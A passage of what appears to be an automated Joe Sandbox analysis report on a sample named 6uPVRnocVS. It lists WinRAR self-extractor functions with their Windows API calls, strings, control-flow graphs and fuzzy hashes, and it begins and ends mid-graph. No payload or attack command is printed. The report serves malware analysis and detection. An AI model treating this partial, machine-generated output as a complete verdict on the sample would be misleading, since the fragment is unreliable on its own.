API calls 24650->24682 24681 f6249 80 API calls 24651->24681 24654 fc9bc 24654->24598 24655->24612 24656->24614 24658 101ad9 24657->24658 24659 101af2 24658->24659 24662 101b06 24658->24662 24683 10075b 84 API calls 24659->24683 24661 101af9 24661->24662 24663->24594 24664->24621 24665->24630 24666->24622 24667->24629 24669 facf5 GetVersionExW 24668->24669 24670 f7dcb 24669->24670 24670->24639 24677 fca82 __vsnwprintf_l 24671->24677 24672 fcbf7 24673 fcc1f 24672->24673 24674 fca0b 6 API calls 24672->24674 24675 10067c SetThreadExecutionState RaiseException 24673->24675 24674->24673 24678 fcbee 24675->24678 24676 1084bd 99 API calls 24676->24677 24677->24672 24677->24676 24677->24678 24679 fab70 89 API calls 24677->24679 24678->24645 24679->24677 24680->24645 24681->24654 24682->24654 24683->24661 24684->24434 24685->24434 24686->24431 24688 f5e4a 24687->24688 24728 f5d67 24688->24728 24690 f5eb5 24690->24447 24692 f5e7d 24692->24690 24733 fad65 CharUpperW CompareStringW 24692->24733 24694 f8289 24693->24694 24739 10179d CharUpperW 24694->24739 24696 f8333 24696->24449 24698 f7d7b 24697->24698 24699 f7dbb 24698->24699 24740 f7043 74 API calls 24698->24740 24699->24458 24701 f7db3 24741 f6dc1 74 API calls 24701->24741 24703->24510 24705 f9d73 24704->24705 24707 f9d82 24704->24707 24706 f9d79 FlushFileBuffers 24705->24706 24705->24707 24706->24707 24708 f9dfb SetFileTime 24707->24708 24708->24516 24709->24438 24710->24440 24711->24446 24712->24458 24713->24458 24714->24455 24715->24471 24716->24462 24717->24471 24718->24481 24719->24468 24720->24484 24721->24487 24722->24487 24723->24487 24724->24487 24725->24487 24726->24512 24727->24509 24734 f5c64 24728->24734 24730 f5d88 24730->24692 24732 f5c64 2 API calls 24732->24730 24733->24692 24737 f5c6e 24734->24737 24735 f5d56 24735->24730 24735->24732 24737->24735 24738 fad65 CharUpperW CompareStringW 24737->24738 24738->24737 24739->24696 24740->24701 24741->24699 24743 fc8db 24742->24743 24748 fa90e 84 API calls 24743->24748 24745 fc90d 24749 fa90e 84 API calls 24745->24749 24747 fc918 24748->24745 24749->24747 24751 fa5fe 24750->24751 24752 fa691 FindNextFileW 24751->24752 24753 fa621 FindFirstFileW 24751->24753 24754 fa69c GetLastError 24752->24754 24755 fa6b0 24752->24755 24756 fa638 24753->24756 24757 fa675 24753->24757 24754->24755 24755->24757 24758 fb66c 2 API calls 24756->24758 24757->24388 24759 fa64d 24758->24759 24760 fa66a GetLastError 24759->24760 24761 fa651 FindFirstFileW 24759->24761 24760->24757 24761->24757 24761->24760 24762->24221 24763->24227 24764->24227 24765->24230 24766->24238 24768 f9ef7 76 API calls 24767->24768 24769 f1f5b 24768->24769 24770 f19a6 97 API calls 24769->24770 24773 f1f78 24769->24773 24771 f1f68 24770->24771 24771->24773 24774 f6dc1 74 API calls 24771->24774 24773->24246 24773->24247 24774->24773 24827 10b8e0 93 API calls _swprintf 24828 108ce0 6 API calls 24831 1216e0 CloseHandle

                                                                                              Executed Functions

                                                                                              Function 0010D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 001000CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001000E4
                                                                                                • Part of subcall function 001000CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001000F6
                                                                                                • Part of subcall function 001000CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00100127
                                                                                                • Part of subcall function 00109DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00109DAC
                                                                                                • Part of subcall function 0010A335: OleInitialize.OLE32(00000000), ref: 0010A34E
                                                                                                • Part of subcall function 0010A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0010A385
                                                                                                • Part of subcall function 0010A335: SHGetMalloc.SHELL32(00138430), ref: 0010A38F
                                                                                                • Part of subcall function 001013B3: GetCPInfo.KERNEL32(00000000,?), ref: 001013C4
                                                                                                • Part of subcall function 001013B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001013D8
                                                                                              • GetCommandLineW.KERNEL32 ref: 0010D61C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0010D643
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0010D654
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0010D68E
                                                                                                • Part of subcall function 0010D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0010D29D
                                                                                                • Part of subcall function 0010D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0010D2D9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0010D697
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,0014DC90,00000800), ref: 0010D6B2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0014DC90), ref: 0010D6BE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0010D6C9
                                                                                              • _swprintf.LIBCMT ref: 0010D708
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0010D71A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0010D721
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0010D738
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0010D789
                                                                                              • Sleep.KERNEL32(?), ref: 0010D7B7
                                                                                              • DeleteObject.GDI32 ref: 0010D7F0
                                                                                              • DeleteObject.GDI32(?), ref: 0010D800
                                                                                              • CloseHandle.KERNEL32 ref: 0010D843
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 788466649-3743209390
                                                                                              • Opcode ID: a9967a8c3e9afb16daaa37b886b68b3f55c6e47627f7b125d0fa12a4232c24ce
                                                                                              • Instruction ID: e9eb08adddcd744a3cef7a78630742a2b00a850ada131c6510d205d6518aa1b9
                                                                                              • Opcode Fuzzy Hash: a9967a8c3e9afb16daaa37b886b68b3f55c6e47627f7b125d0fa12a4232c24ce
                                                                                              • Instruction Fuzzy Hash: DC61E371A04340AFD320ABA5FC49F2B37E8FB55745F000429F585A29E1DBF8C994CBA2
                                                                                              Function 00109E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 770 109e1c-109e38 FindResourceW 771 109e3e-109e50 SizeofResource 770->771 772 109f2f-109f32 770->772 773 109e70-109e72 771->773 774 109e52-109e61 LoadResource 771->774 776 109f2e 773->776 774->773 775 109e63-109e6e LockResource 774->775 775->773 777 109e77-109e8c GlobalAlloc 775->777 776->772 778 109e92-109e9b GlobalLock 777->778 779 109f28-109f2d 777->779 780 109f21-109f22 GlobalFree 778->780 781 109ea1-109ebf call 10f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 109ec1-109ee3 call 109d7b 781->784 785 109f1a-109f1b GlobalUnlock 781->785 784->785 790 109ee5-109eed 784->790 785->780 791 109f08-109f16 790->791 792 109eef-109f03 GdipCreateHBITMAPFromBitmap 790->792 791->785 792->791 793 109f05 792->793 793->791
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(0010AE4D,PNG,?,?,?,0010AE4D,00000066), ref: 00109E2E
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0010AE4D,00000066), ref: 00109E46
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E59
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E64
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0010AE4D,00000066), ref: 00109E82
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00109E93
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00109EB7
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00109EFC
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00109F1B
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00109F22
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 3656887471-364855578
                                                                                              • Opcode ID: 70e2dd799303cf23e543b3d9398978b25eab24a1a397b20a4f4799a3d7ab0ff5
                                                                                              • Instruction ID: 47d5fc8aea4b36cff1236bc389388020d41f49b40ecde2481878356a49bb5d9b
                                                                                              • Opcode Fuzzy Hash: 70e2dd799303cf23e543b3d9398978b25eab24a1a397b20a4f4799a3d7ab0ff5
                                                                                              • Instruction Fuzzy Hash: 7831A271204316BFC7219F21DC5892BBFADFF89751B040528F892D26A1EB75DC61CB60
                                                                                              Function 000FA5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 970 fa5f4-fa61f call 10e360 973 fa691-fa69a FindNextFileW 970->973 974 fa621-fa632 FindFirstFileW 970->974 975 fa69c-fa6aa GetLastError 973->975 976 fa6b0-fa6b2 973->976 977 fa6b8-fa75c call ffe56 call fbcfb call 100e19 * 3 974->977 978 fa638-fa64f call fb66c 974->978 975->976 976->977 979 fa761-fa774 976->979 977->979 985 fa66a-fa673 GetLastError 978->985 986 fa651-fa668 FindFirstFileW 978->986 987 fa675-fa678 985->987 988 fa684 985->988 986->977 986->985 987->988 990 fa67a-fa67d 987->990 991 fa686-fa68c 988->991 990->988 993 fa67f-fa682 990->993 991->979 993->991
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA628
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA65E
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA66A
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA692
                                                                                              • GetLastError.KERNEL32(?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA69E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                              • String ID:
                                                                                              • API String ID: 869497890-0
                                                                                              • Opcode ID: 3cfc843227385f6c7977b53a69d6c85481e681433d2471f187a1a2b9607454de
                                                                                              • Instruction ID: be782913e5e327cf2b6be36796dec7779e68315e7568ba73b6eb6e1159f787b8
                                                                                              • Opcode Fuzzy Hash: 3cfc843227385f6c7977b53a69d6c85481e681433d2471f187a1a2b9607454de
                                                                                              • Instruction Fuzzy Hash: 58417675604645AFC324EF68C884AEAF7E8BF49340F040929F6EDD3241D774A9549FA2
                                                                                              Function 0011753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002,00000000), ref: 0011755E
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002,00000000), ref: 00117565
                                                                                              • ExitProcess.KERNEL32 ref: 00117577
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 698b008019a473a19f9859b845dfbb7399ada0c34fbc4a99722ab6cafb4b612d
                                                                                              • Instruction ID: 3b3bae045d6c569a7689a145d5f070fe36891d7fcfc17ffbfed469643408c00d
                                                                                              • Opcode Fuzzy Hash: 698b008019a473a19f9859b845dfbb7399ada0c34fbc4a99722ab6cafb4b612d
                                                                                              • Instruction Fuzzy Hash: 64E04631004508ABCF25AF24DD08A883F3AEF10782F008424F8098A672CB39DEE3CB50
                                                                                              Function 000F857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3004599000-0
                                                                                              • Opcode ID: 9ce6623b7c9ea03e9b5cb39e93dbd049bf7dfef1f53da55babda9321a4057100
                                                                                              • Instruction ID: 057c756b201ca58ec28cd99b881db592f392b33a095e9d68d89b6e81706e1698
                                                                                              • Opcode Fuzzy Hash: 9ce6623b7c9ea03e9b5cb39e93dbd049bf7dfef1f53da55babda9321a4057100
                                                                                              • Instruction Fuzzy Hash: DF821B7090424DAEDF65DB64C885BFEB7E9BF15300F0881B9EA499B943DF305A48EB50
                                                                                              Function 0010AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010AEE5
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prologItemTextWindow
                                                                                              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 810644672-8108337
                                                                                              • Opcode ID: cd745adc60badc7e3f3079596281d39ad2e1dad8f3e9adf5123584cb94c00782
                                                                                              • Instruction ID: 066786592b404147caafc7236c8c753a03b9f74c2e9538c882b74019ec5ad8a0
                                                                                              • Opcode Fuzzy Hash: cd745adc60badc7e3f3079596281d39ad2e1dad8f3e9adf5123584cb94c00782
                                                                                              • Instruction Fuzzy Hash: 4A42D671948355FEEB219BA09CCAFFE7B7CAB12705F404055F681A68E2CBF44984CB61
                                                                                              Function 001000CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 257 1000cf-1000ee call 10e360 GetModuleHandleW 260 1000f0-100107 GetProcAddress 257->260 261 100154-1003b2 257->261 264 100121-100131 GetProcAddress 260->264 265 100109-10011f 260->265 262 100484-1004b3 GetModuleFileNameW call fbc85 call ffe56 261->262 263 1003b8-1003c3 call 1170dd 261->263 279 1004b5-1004bf call facf5 262->279 263->262 274 1003c9-1003fa GetModuleFileNameW CreateFileW 263->274 264->261 266 100133-100152 264->266 265->264 266->261 276 100478-10047f CloseHandle 274->276 277 1003fc-10040a SetFilePointer 274->277 276->262 277->276 280 10040c-100429 ReadFile 277->280 286 1004c1-1004c5 call 100085 279->286 287 1004cc 279->287 280->276 282 10042b-100450 280->282 284 10046d-100476 call ffbd8 282->284 284->276 293 100452-10046c call 100085 284->293 294 1004ca 286->294 288 1004ce-1004d0 287->288 291 1004f2-100518 call fbcfb GetFileAttributesW 288->291 292 1004d2-1004f0 CompareStringW 288->292 295 10051a-10051e 291->295 301 100522 291->301 292->291 292->295 293->284 294->288 295->279 300 100520 295->300 302 100526-100528 300->302 301->302 303 100560-100562 302->303 304 10052a 302->304 305 100568-10057f call fbccf call facf5 303->305 306 10066f-100679 303->306 307 10052c-100552 call fbcfb GetFileAttributesW 304->307 317 100581-1005e2 call 100085 * 2 call fddd1 call f400a call fddd1 call 109f35 305->317 318 1005e7-10061a call f400a AllocConsole 305->318 313 100554-100558 307->313 314 10055c 307->314 313->307 316 10055a 313->316 314->303 316->303 323 100667-100669 ExitProcess 317->323 318->323 324 10061c-100661 GetCurrentProcessId AttachConsole call 1135b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->324 324->323
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 001000E4
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001000F6
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00100127
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001003D4
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001003F0
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00100402
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00123BA4,00000000), ref: 00100421
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00100479
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0010048F
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001004E7
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00100510
                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0010054A
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • _swprintf.LIBCMT ref: 001005BE
                                                                                              • _swprintf.LIBCMT ref: 0010060A
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • AllocConsole.KERNEL32 ref: 00100612
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0010061C
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00100623
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00100649
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00100650
                                                                                              • Sleep.KERNEL32(00002710), ref: 0010065B
                                                                                              • FreeConsole.KERNEL32 ref: 00100661
                                                                                              • ExitProcess.KERNEL32 ref: 00100669
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1201351596-3298887752
                                                                                              • Opcode ID: d54a727b9d6e3f8b75a3939c7e80c8e7e6ab6b7d208afe494e6a3133c267b69e
                                                                                              • Instruction ID: cfb90e964fbccdae76fad07b297d0cdfd960a047ebb91f82509f9d3b76b7a9f3
                                                                                              • Opcode Fuzzy Hash: d54a727b9d6e3f8b75a3939c7e80c8e7e6ab6b7d208afe494e6a3133c267b69e
                                                                                              • Instruction Fuzzy Hash: 34D186B1108394ABD331DF50ED49BDFBAE8FB84704F40091DF6E8A6180D7B886598F66
                                                                                              Function 0010BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 406 10bdf5-10be0d call 10e28c call 10e360 411 10ca90-10ca9d 406->411 412 10be13-10be3d call 10aa36 406->412 412->411 415 10be43-10be48 412->415 416 10be49-10be57 415->416 417 10be58-10be6d call 10a6c7 416->417 420 10be6f 417->420 421 10be71-10be86 call 1017ac 420->421 424 10be93-10be96 421->424 425 10be88-10be8c 421->425 426 10ca5c-10ca87 call 10aa36 424->426 427 10be9c 424->427 425->421 428 10be8e 425->428 426->416 440 10ca8d-10ca8f 426->440 429 10c132-10c134 427->429 430 10bea3-10bea6 427->430 431 10c074-10c076 427->431 432 10c115-10c117 427->432 428->426 429->426 438 10c13a-10c141 429->438 430->426 436 10beac-10bf06 call 109da4 call fb965 call fa49d call fa5d7 call f70bf 430->436 431->426 435 10c07c-10c088 431->435 432->426 437 10c11d-10c12d SetWindowTextW 432->437 441 10c08a-10c09b call 117168 435->441 442 10c09c-10c0a1 435->442 497 10c045-10c05a call fa52a 436->497 437->426 438->426 439 10c147-10c160 438->439 444 10c162 439->444 445 10c168-10c176 call 1135b3 439->445 440->411 441->442 448 10c0a3-10c0a9 442->448 449 10c0ab-10c0b6 call 10ab9a 442->449 444->445 445->426 460 10c17c-10c185 445->460 453 10c0bb-10c0bd 448->453 449->453 458 10c0c8-10c0e8 call 1135b3 call 1135de 453->458 459 10c0bf-10c0c6 call 1135b3 453->459 480 10c101-10c103 458->480 481 10c0ea-10c0f1 458->481 459->458 465 10c187-10c18b 460->465 466 10c1ae-10c1b1 460->466 465->466 470 10c18d-10c195 465->470 472 10c296-10c2a4 call ffe56 466->472 473 10c1b7-10c1ba 466->473 470->426 476 10c19b-10c1a9 call ffe56 470->476 489 10c2a6-10c2ba call 1117cb 472->489 478 10c1c7-10c1e2 473->478 479 10c1bc-10c1c1 473->479 476->489 492 10c1e4-10c21e 478->492 493 10c22c-10c233 478->493 479->472 479->478 480->426 488 10c109-10c110 call 1135ce 480->488 486 10c0f3-10c0f5 481->486 487 10c0f8-10c100 call 117168 481->487 486->487 487->480 488->426 506 10c2c7-10c318 call ffe56 call 10a8d0 GetDlgItem SetWindowTextW SendMessageW call 1135e9 489->506 507 10c2bc-10c2c0 489->507 526 10c220 492->526 527 10c222-10c224 492->527 499 10c261-10c284 call 1135b3 * 2 493->499 500 10c235-10c24d call 1135b3 493->500 513 10c060-10c06f call fa4b3 497->513 514 10bf0b-10bf1f SetFileAttributesW 497->514 499->489 533 10c286-10c294 call ffe2e 499->533 500->499 519 10c24f-10c25c call ffe2e 500->519 540 10c31d-10c321 506->540 507->506 512 10c2c2-10c2c4 507->512 512->506 513->426 521 10bfc5-10bfd5 GetFileAttributesW 514->521 522 10bf25-10bf58 call fb4f7 call fb207 call 1135b3 514->522 519->499 521->497 525 10bfd7-10bfe6 DeleteFileW 